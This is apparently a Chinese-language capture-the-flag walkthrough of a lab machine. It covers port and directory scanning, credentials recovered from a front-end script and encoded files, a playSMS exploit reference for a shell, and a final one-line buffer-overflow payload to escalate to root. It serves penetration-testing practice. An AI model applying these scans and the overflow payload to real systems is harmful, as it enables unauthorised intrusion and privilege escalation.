nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)

nmap -p139,445 -A -T5 --script=smb-enum-shares 10.129.135.112

nmap -sU --top-ports 100 10.129.135.112 (扫描UDP)

gobuster dir -u http://10.129.135.112:9999/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

http://10.129.135.112:1880/

http://10.129.135.112:9999/

http://10.129.135.112:9999/backup/

再尝试登入admin的时后发现没有提交到后台 查看下前端验证,http://10.129.135.112:9999/admin/js/login.js

很明显密码为superduperlooperpassword_lol

登入成功后出现这个

https://www.dcode.fr/ook-language尝试解密

Nothing here check /asdiSIAJJ0QWE9JAS

http://10.129.135.112:9999/backup/password.txt

出现账号密码:imnothuman,尝试登入1880端口也无法登入

http://10.129.135.112:9999/asdiSIAJJ0QWE9JAS/

访问后发现类似base64的挡案 直接进行解密后保存 看文件挡案是啥

然后进行爆破

发现16进制文件

解密出来跟上面一样 ,又回到刚开始的密码学知识点，再次将其解密，地址：https://www.splitbrain.org/_static/ook/

然后扫描路径的时后发现/dev/backup底下还有个cms

直接使用cms拿下SHELL

http://10.129.135.112:9999/playsms/index.php?app=main&inc=core_auth&route=login

对应的exploit地址：https://www.exploit-db.com/exploits/42044

反弹SHELL结束后...

读取完成user.txt之后查找4000权限的文件

找到一个二进制文件，知道本靶机需要使用缓冲区溢出漏洞进行提权，具体分析可参考：https://0xdf.gitlab.io/2019/03/23/htb-frolic.html

./rop `python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + '\xd0\x79\xe4\xb4' + '\x0b\x4a\xf7\xb7'"`